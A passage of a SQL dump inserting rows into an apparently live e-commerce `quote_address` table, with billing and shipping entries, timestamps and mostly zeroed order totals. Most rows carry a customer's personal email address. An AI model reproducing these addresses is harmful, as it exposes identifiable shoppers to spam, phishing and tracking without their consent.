(96, 43, '2021-11-06 09:04:50', '2021-11-06 09:04:50', 19, 0, NULL, 'shipping', 'summersroger9@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(97, 44, '2021-11-20 19:00:26', '2021-11-20 19:00:26', 20, 0, NULL, 'billing', 'GaryMiller4A@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(98, 44, '2021-11-20 19:00:26', '2021-11-20 19:00:26', 20, 0, NULL, 'shipping', 'GaryMiller4A@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(99, 45, '2021-11-22 09:55:18', '2021-11-22 09:55:18', 21, 0, NULL, 'billing', 'blairdaniella5@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(100, 45, '2021-11-22 09:55:18', '2021-11-22 09:55:18', 21, 0, NULL, 'shipping', 'blairdaniella5@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(101, 46, '2021-12-03 09:49:21', '2021-12-03 09:49:21', 22, 0, NULL, 'billing', 'BeatriceSutton385583@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(102, 46, '2021-12-03 09:49:21', '2021-12-03 09:49:21', 22, 0, NULL, 'shipping', 'BeatriceSutton385583@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(103, 47, '2021-12-21 02:49:22', '2021-12-21 02:49:22', 23, 0, NULL, 'billing', 'LloydJTrask@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(104, 47, '2021-12-21 02:49:22', '2021-12-21 02:49:22', 23, 0, NULL, 'shipping', 'LloydJTrask@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(105, 48, '2021-12-22 07:28:08', '2021-12-22 07:28:08', 24, 0, NULL, 'billing', 'RamiroGolubev247@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(106, 48, '2021-12-22 07:28:08', '2021-12-22 07:28:08', 24, 0, NULL, 'shipping', 'RamiroGolubev247@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(107, 49, '2021-12-22 16:48:24', '2021-12-22 16:48:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(108, 49, '2021-12-22 16:48:24', '2021-12-22 16:48:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(109, 50, '2021-12-31 16:38:38', '2021-12-31 16:38:38', 25, 0, NULL, 'billing', 'cava2563@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(110, 50, '2021-12-31 16:38:38', '2021-12-31 16:38:38', 25, 0, NULL, 'shipping', 'cava2563@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(111, 51, '2022-01-06 21:12:41', '2022-01-06 21:12:41', 26, 0, NULL, 'billing', 'markformel23.5.6@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(112, 51, '2022-01-06 21:12:41', '2022-01-06 21:12:41', 26, 0, NULL, 'shipping', 'markformel23.5.6@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(113, 52, '2022-01-12 14:38:27', '2022-01-12 14:38:27', 27, 0, NULL, 'billing', 'haelliott7@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(114, 52, '2022-01-12 14:38:27', '2022-01-12 14:38:27', 27, 0, NULL, 'shipping', 'haelliott7@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(115, 53, '2022-01-14 01:49:29', '2022-01-14 01:49:29', 28, 0, NULL, 'billing', 'slee84134@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(116, 53, '2022-01-14 01:49:29', '2022-01-14 01:49:29', 28, 0, NULL, 'shipping', 'slee84134@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(117, 54, '2022-01-15 11:28:04', '2022-01-15 11:28:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(118, 54, '2022-01-15 11:28:04', '2022-01-15 11:28:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(119, 55, '2022-01-22 07:27:27', '2022-01-22 07:27:27', 29, 0, NULL, 'billing', 'davenportmayo278905@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(120, 55, '2022-01-22 07:27:27', '2022-01-22 07:27:27', 29, 0, NULL, 'shipping', 'davenportmayo278905@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(121, 56, '2022-01-23 09:16:38', '2022-01-23 09:16:38', 30, 0, NULL, 'billing', 'foleylane554743@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(122, 56, '2022-01-23 09:16:38', '2022-01-23 09:16:38', 30, 0, NULL, 'shipping', 'foleylane554743@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(123, 57, '2022-02-07 18:51:32', '2022-02-07 18:51:32', 31, 0, NULL, 'billing', 'premises.okonski7z@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(124, 57, '2022-02-07 18:51:32', '2022-02-07 18:51:32', 31, 0, NULL, 'shipping', 'premises.okonski7z@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(125, 58, '2022-02-23 21:09:12', '2022-02-23 21:09:12', 32, 0, NULL, 'billing', 'sherikahollimanfgv5@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(126, 58, '2022-02-23 21:09:12', '2022-02-23 21:09:12', 32, 0, NULL, 'shipping', 'sherikahollimanfgv5@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(127, 59, '2022-02-24 23:13:00', '2022-02-24 23:13:00', 33, 0, NULL, 'billing', 'baileyknight902@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(128, 59, '2022-02-24 23:13:01', '2022-02-24 23:13:01', 33, 0, NULL, 'shipping', 'baileyknight902@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(129, 60, '2022-03-02 13:47:57', '2022-03-02 13:47:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(130, 60, '2022-03-02 13:47:57', '2022-03-02 13:47:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 8.0000, 642.0000, 642.0000, 513.6000, 513.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -128.4000, -128.4000, 513.6000, 513.6000, NULL, '[]', NULL, 0.0000, 0.0000, 642.0000, 642.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(131, 61, '2022-03-06 21:48:06', '2022-03-06 21:48:06', 34, 0, NULL, 'billing', 'paswinskiegstephaniesy@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(132, 61, '2022-03-06 21:48:06', '2022-03-06 21:48:06', 34, 0, NULL, 'shipping', 'paswinskiegstephaniesy@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(133, 62, '2022-03-21 09:39:05', '2022-03-21 09:39:05', 35, 0, NULL, 'billing', 'ac316995@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(134, 62, '2022-03-21 09:39:05', '2022-03-21 09:39:05', 35, 0, NULL, 'shipping', 'ac316995@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(135, 63, '2022-03-27 13:21:48', '2022-03-27 13:21:48', 36, 0, NULL, 'billing', 'selinamdws@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(136, 63, '2022-03-27 13:21:49', '2022-03-27 13:21:49', 36, 0, NULL, 'shipping', 'selinamdws@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(137, 64, '2022-03-28 13:01:37', '2022-03-28 13:01:37', 37, 0, NULL, 'billing', 'wjwjbsvgdnsvd@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(138, 64, '2022-03-28 13:01:37', '2022-03-28 13:01:37', 37, 0, NULL, 'shipping', 'wjwjbsvgdnsvd@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
